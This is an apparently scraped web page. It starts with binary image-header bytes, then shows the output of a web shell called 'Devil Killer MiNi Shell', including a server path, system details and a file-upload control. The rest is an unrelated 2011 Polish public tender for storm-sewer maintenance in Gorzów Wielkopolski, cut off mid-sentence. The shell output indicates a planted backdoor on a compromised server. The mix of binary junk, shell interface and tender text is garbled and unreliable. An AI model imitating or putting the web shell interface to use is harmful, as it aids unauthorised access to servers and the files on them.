JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111208/324255-N-2011.html

<p class="kh_header"><b>Gorzów Wielkopolski: UTRZYMANIE KANALIZACJI DESZCZOWEJ W ULICACH MIASTA 
GORZOWA WLKP</b><br>
<b>Numer ogłoszenia: 324255 - 2011; data zamieszczenia: 08.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Gorzów Wlkp. , ul. Sikorskiego 3-4, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7355576, faks 095 7355612.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gorzow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> UTRZYMANIE KANALIZACJI DESZCZOWEJ W ULICACH MIASTA 
GORZOWA WLKP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi polegające na utrzymaniu kanalizacji deszczowej na terenie miasta Gorzowa Wlkp.
OPIS PRZEDMIOTU ZAMÓWIENIA:
Zamówieniem objęte są usługi związane z utrzymaniem i funkcjonowaniem kanalizacji deszczowej na terenie miasta Gorzowa Wlkp.
Zakres prac obejmuje między innymi:
1.Czyszczenie studni rewizyjnych i ulicznych studzienek ściekowych.
2.Czyszczenie kanałów i przykanalików sieci kanalizacji deszczowej.
3.Czyszczenie odwodnień liniowych terenu typu ACO-DRAIN.
4.Wymiana uszkodzonych włazów i kratek ściekowych oraz elementów odwodnień liniowych - ACO-DRAIN.
5.Regulacja pionowa włazów i kratek ściekowych.
6.Przeglądy techniczne istniejących i nowobudowanych sieci kanalizacji deszczowych
7.Przekazanie raz w miesiącu informacji o odpadach wytworzonych podczas realizacji zleconych prac. 
Szczegółowy zakres prac został określony w zał. nr 1 SIWZ w formularzu cenowym.
Długość sieci kanalizacji deszczowej wynosi  w przybliżeniu 260 kilometry.
Studni rewizyjnych kanalizacji deszczowej jest ok. 9 000 sztuk.
Wpustów ulicznych kanalizacji deszczowej jest ok. 5 000 sztuk.
ZAKRES  ZAMÓWIENIA
1. CZYSZCZENIE WPUSTU ULICZNEGO -  jednostka: 1 szt.
Wyszczególnienie robót:
1)zdjęcie kratki ściekowej,
2)wyjęcie osadu z osadnika wpustu deszczowego,
3)udrożnienie przykanalika,
4)założenie kratki ściekowej,
5)wykonanie prac porządkowych.
2. CZYSZCZENIE WPUSTU PODCHODNIKOWEGO-  jednostka: 1 szt.
Wyszczególnienie robót:
1)zdjęcie płyty
2)wyjęcie osadu z osadnika wpustu deszczowego,
3)udrożnienie przykanalika,
4)założenie płyty
5)wykonanie prac porządkowych.
3. UDROŻNIENIE KANALIZACJI BURZOWEJ -  jednostka: 1 mb
Wyszczególnienie robót:
1)otwarcie pokrywy włazu studni rewizyjnej,
2) wprowadzenie urządzeń czyszczących do kanału,
3)oczyszczenie kanału z osadu,
4)wybranie ze studni osadu,
5)zamknięcie pokrywy włazu studni rewizyjnej, wykonanie prac porządkowych.
3.1   fi 200 do < fi 300 mm
3.2   fi300 do < fi400 mm
3.3   fi 400 do < fi 500 mm
3.4   fi 500 do < fi 600 mm
3.5   fi 600 do < fi 800 mm
3.6   fi 800 do < fi 1000 mm
3.7   fi 1000 do < fi 1200 mm
3.8   fi  1200 do < fi 1400 mm
3.9   fi 1400 do < fi 1800 mm
3.10  fi 1800 mm
3.11  Wyszczególnienie robót:
1)otworzenie rusztów z koryt ACO-DRAIN,
2)oczyszczenie koryta z osadu,
3)zamknięcie koryt poprzez zamocowanie rusztów,
4)wykonanie prac porządkowych
4. CZYSZCZENIE STUDNI REWIZYJNEJ i CHŁONNEJ - jednostka: 1 szt.
Wyszczególnienie robót:
1)zdjęcie pokrywy włazowej,
2)wyjęcie osadu ze studni,
3)założenie pokrywy włazowej,
4)wykonanie prac porządkowych.
5 NAPRAWY BIEŻĄCE
5.1. Regulacja  pionowa wpustu ulicznego z materiałem z zabezpieczeniem (rygiel, zawias, zatrzask) klasy D400 - jednostka: 1 szt.
Wyszczególnienie robót:
1)zdjęcie kratki ściekowej,
2)usunięcie osadu,
3)rozebranie uszkodzonej górnej części studzienki,
4)odkucie uszkodzonej nawierzchni i podbudowy wokół urządzenia,
5)zebranie i odrzucenie gruzu na pobocze,
6)wykonanie deskowania,
7)ułożenie i zagęszczenie betonu,
8)rozebranie deskowania,
9)osadzenie kratki ściekowej na zaprawie cementowej wraz z jej przygotowaniem,
10)uzupełnienie masą asfaltową do niwelety nawierzchni,
11)wykonanie prac porządkowych. 
5.2. Regulacja  pionowa wpustu ulicznego bez materiału - jednostka: 1 szt.
Wyszczególnienie robót jak w poz. 5.1 bez ujmowania w kalkulacji ceny kratki.
5.3. Wymiana wpustu ulicznego klasy D400 (skrzynki żeliwnej) z zabezpieczeniem (rygiel, zawias, zatrzask) wraz z wykonaniem studzienki ściekowej z gotowych elementów betonowych z osadnikiem - z materiałem - 	jednostka: 1 szt.
Wyszczególnienie robót: 	jednostka: 1 szt.
Wyszczególnienie robót:
1)rozebranie nawierzchni i podbudowy wokół wpustu,
2) zebranie i odrzucenie gruzu na pobocze,
3)wyjęcie starej skrzynki żeliwnej wpustu,
4)wymurowanie dna studzienki,
5)opuszczenie do wykopu i ustawienie kompletu elementów betonowych,
6)ustawienie wpustu żeliwnego ściekowego,
7)zaklinowanie wpustu,
8)zabetonowanie dna,
9)wykonanie deskowania,
10)ułożenie i zagęszczenie betonu,
11)rozebranie deskowania,
12)uzupełnienie masą asfaltową do niwelety nawierzchni,
13)wykonanie prac porządkowych.
5.4Uzupełnienie kratki żeliwnej od wpustu deszczowego klasy D400 - z materiałem -jednostka: 1 szt.
Wyszczególnienie robót:
1)wyjęcie uszkodzonej kratki, 
2)oczyszczenie krawędzi korpusu skrzynki żeliwnej, 
3)ułożenie nowej kratki żeliwnej. 
5.5 Uzupełnienie kratki żeliwnej od wpustu deszczowego lub włazu kanałowego bez materiału (materiał Inwestora) - jednostka: 1 szt.
Wyszczególnienie robót jak w poz. 5.4. bez ujmowania w kalkulacji ceny kratki żeliwnej bądź włazu kanałowego.
5.6 Wymiana włazu kanałowego betonowego z wypełnieniem betonowym klasy D400 i z napisem: Kanalizacja Deszczowa - Gorzów  -  z materiałem - jednostka: 1 szt.
1)zdjęcie uszkodzonej pokrywy włazowej,
2)oczyszczenie pierścienia dystansowego,
3)założenie nowego włazu na studni kanalizacji deszczowej.
4)uporządkowanie terenu
5.7 Wymiana włazu kanałowego bez materiału (materiał Inwestora)  - jednostka: 1 szt.
Wyszczególnienie robót jak w poz. 5.6 bez ujmowania w kalkulacji ceny włazu kanałowego.
5.8Zabezpieczenie studni kanalizacji deszczowej płytą betonową założenie płyty betonowej na niezabezpieczoną studnię kanalizacji deszczowej.
5.9 Regulacja pionowa włazu kanałowego z materiałem w jezdni (żeliwne z wypełnieniem betonowym, klasy D400) i z napisem: Kanalizacja Deszczowa - Gorzów - jednostka: 1 szt.
Wyszczególnienie robót:
1)zdjęcie pokrywy włazowej,
2)odkucie nawierzchni i podbudowy wokół urządzenia,
3)zebranie i odrzucenie gruzu na pobocze,
4)wyjęcie włazu,
5)uzupełnienie ewentualnych ubytków (podmurowanie),
6)osadzenie pierścienia dystansowego,
7)osadzenie ponowne włazu na zaprawie cementowej,
8)wykonanie deskowania wokół włazu,
9)ułożenie i zagęszczenie betonu,
10)rozebranie deskowania,
11)uzupełnienie masą asfaltową do niwelety nawierzchni,
12)wykonanie prac porządkowych.
5.10 Regulacja pionowa włazu kanałowego żeliwnego z wypełnieniem betonowym i z napisem: Kanalizacja Deszczowa - Gorzów z materiałem w terenie nieutwardzonym i w chodniku - jednostka: 1 szt. 	
Wyszczególnienie robót:
1)zdjęcie pokrywy włazowej,
2)usunięcie nawierzchni i podbudowy wokół urządzenia na pobocze,
3)wyjęcie włazu,
4)uzupełnienie ewentualnych ubytków (podmurowanie),
5)osadzenie pierścienia dystansowego,
6)osadzenie ponowne włazu na zaprawie cementowej,
7)uzupełnienie nawierzchni,
8) wykonanie prac porządkowych.
5.11 Przekazanie wpustu ulicznego klasy D400  z zabezpieczeniem (rygiel, zawias, zatrzask) na potrzeby zamawiającego (cena materiału bez usługi) - jednostka 1 szt.
5.12 Przekazanie włazu kanałowego klasy D400 żeliwnego z wypełnieniem betonowym i z napisem: Kanalizacja Deszczowa - Gorzów na potrzeby zamawiającego (cena materiału bez usługi) - jednostka 1 szt.
5.13Regulacja  pionowa istniejącego wpustu ulicznego z nowym osadnikiem - jednostka: 1 szt.
Wyszczególnienie robót:
1)zdjęcie kratki ściekowej,
2)usunięcie osadu,
3)rozebranie górnej części studzienki,
4)odkucie uszkodzonej nawierzchni i podbudowy wokół urządzenia,
5)zebranie i odrzucenie gruzu na pobocze,
6)demontaż uszkodzonego osadnika, 
7)montaż nowego osadnika,
8)wykonanie deskowania,
9)ułożenie i zagęszczenie betonu,
10)rozebranie deskowania,
11)osadzenie kratki ściekowej na zaprawie cementowej wraz z jej przygotowaniem,
12)uzupełnienie masą asfaltową do niwelety nawierzchni,
13)wykonanie prac porządkowych. 
 6.  WYMUROWANIE KOMINÓW W STUDNIACH Z CEGŁY KLINKIEROWEJ - z materiałem -  jednostka: 1 szt.
Wyszczególnienie robót:  wymurowanie ścian kominów do wysokości 1m.
7.  Wymiana wpustu ulicznego (skrzynki żeliwnej) z zabezpieczeniem (rygiel, zawias, zatrzask) klasy D400 - z materiałem - 	jednostka: 1 szt.
Wyszczególnienie robót:
1)rozebranie nawierzchni i podbudowy wokół wpustu,
2)zebranie i odrzucenie gruzu na pobocze,
3)wyjęcie starej skrzynki żeliwnej wpustu,
4)osadzenie nowego wpustu,
5)wykonanie deskowania,
6)ułożenie i zagęszczenie betonu,
7)rozebranie deskowania,
8)uzupełnienie masą asfaltową do niwelety nawierzchni,
9)wykonanie prac porządkowych.
8.PRZYSPAWANIE ELEMENTÓW KANALIZACJI DESZCZOWEJ - jednostka 1 szt.
9.WYKONANIE DNA BETONOWEGO WE WPUŚCIE - jednostka 1 szt.
10.WYPOMPOWANIE WODY Z TERENU, KTÓRY ULEGŁ PODTOPIENIU - jednostka 1 roboczogodzina
Wyszczególnienie robót: 
1)Wypompowanie wody z terenu który uległ podtopieniu, wskazanego przez Zamawiającego bądź Straż Miejską, Policję przy użyciu wozu asenizacyjnego. 
2)Zamawiający naliczy ilość roboczogodzin na podstawie otrzymanego mms, który należy przesłać na początku i na koniec przeprowadzonych prac.
11. ROBOTY RÓŻNE NIEOBMIAROWE INTERWENCYJNE, Z  DOJAZDEM  I  WYKORZYSTANIEM SPRZĘTU ORAZ NARZĘDZI  - jednostka: 1 roboczogodzina 
Wyszczególnienie robót: 
wykonanie prac nie wyszczególnionych w tabeli z dojazdem i wykorzystaniem sprzętu oraz narzędzi między innymi: usuwanie zawałów, wyklejenie kolektora, usunięcie korzeni ze światła kolektora.
12. PRZEGLĄD SIECI KANALIZACJI DESZCZOWEJ - jednostka: 1 roboczogodzina
Wyszczególnienie robót:
przeglądy techniczne wskazanych przez Zamawiającego odcinków sieci kanalizacji deszczowej na terenie miasta Gorzowa Wlkp. między innymi udział w pracach odbiorowych zadań inwestycyjnych - sporządzenie opinii na piśmie.
13. OCENA STANU TECHNICZNEGO KANALIZACJI DESZCZOWEJ - jednostka: 1 mb.
Wyszczególnienie robót:
Przedstawienie na piśmie oceny stanu technicznego kanalizacji deszczowej na podstawie inspekcji telewizyjnej odcinków sieci kanalizacji deszczowej wskazanych przez Zamawiającego oraz sporządzenie oceny stanu technicznego na piśmie z określeniem technologii oraz zakresu prac naprawczych.
14. INSPEKCJA TELEWIZYJNA SIECI KANALIZACJI DESZCZOWEJ - jednostka: 1   roboczogodzina
Wyszczególnienie robót: 
 wykonanie inspekcji telewizyjnej wraz z raportem wyznaczonych przez Zamawiającego odcinków kanalizacji deszczowej 
15. Uszczelnienie wpustu lub studni kanalizacji deszczowej  - jednostka: 1 szt.
Wyszczególnienie robót: 
uzupełnienie ubytków w ściankach oraz wyklejenie nieszczelności wpustów i studni kanalizacji deszczowej.
16. Sprawdzenie sygnału o awarii kanalizacji deszczowej  - jednostka: 1 szt.
Wyszczególnienie robót: 
1)dojazd na miejsce zgłoszenia  awarii kanalizacji deszczowej w mieście 
2)zabezpieczenie miejsca awarii przez ustawienie odpowiedniego oznakowania drogowego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających zgodnie z art. 67 ust. 1 pkt 6 stawy Pzp  w stosunku do zamówienia podstawowego, opisanego w SIWZ.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.48.00.00-5, 50.80.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 5 000,00 zł. (słownie: pięć  tysięcy  złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają aktualne zezwolenie w zakresie gospodarowania odpadami komunalnymi (zbieranie, transport, odzysk lub unieszkodliwianie) lub podpisaną umowę  z firmą posiadającą takie uprawnienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykonali lub wykonują w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną usługę w ulicach miasta w ruchu ulicznym zgodne z przedmiotem zamówienia - przy czym umowa na realizację tej usługi winna trwać nieprzerwanie przez okres minimum sześć miesięcy -  i załączyli dokumenty potwierdzające, że usługa ta została należycie wykonana, (np. referencje).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują niezbędnymi do wykonania zamówienia narzędziami i urządzeniami lub będą dysponować i przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, przy czym Zamawiający określa niezbędne minimum sprzętu, tj.:
-samochód asenizacyjny - 2 sztuki,
-samochód ciśnieniowy - 2 sztuki,
-samochód wyposażony w oprzyrządowanie do kamerownia sieci kanalizacji o średnicy minimum 150mm   - 1 szt.
-koparka - 1 sztuka,
-samochód dostawczy - 1 sztuka,
-sprężarka - 2 sztuki,
-agregat prądotwórczy - 2 sztuki,
-samochód skrzyniowy lub samowyładowczy - 1 sztuka,
-młoty pneumatyczne - 2 sztuki,
-pilarka - 1 sztuka.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują osobami (minimum 5 osób) zdolnymi do wykonania zamówienia lub będą dysponować takimi osobami i przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, posiadających niezbędne kwalifikacje tj.:
- co najmniej jeden z pracowników  powinien posiadać uprawnienia budowlane do kierowania robotami w branży sanitarnej oraz  aktualne zaświadczenia o członkostwie we właściwej izbie samorządu zawodowego, 
-  co najmniej dwóch pracowników z uprawnieniami do obsługi wozów ciśnieniowych,
- co najmniej dwóch pracowników z uprawnieniami do obsługi wozów asenizacyjnych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Upoważnienie dla osoby reprezentującej Wykonawcę, o ile nie wynika to z innych dokumentów. W przypadku zawiązania konsorcjum należy załączyć pełnomocnictwo dla podmiotu reprezentującego kilku Wykonawców. 2.Pisemne zobowiązanie podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia 3. Zakres zamówienia, który zostanie zlecony podwykonawcom. 4.Dowód wniesienia wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty w następujących przypadkach:
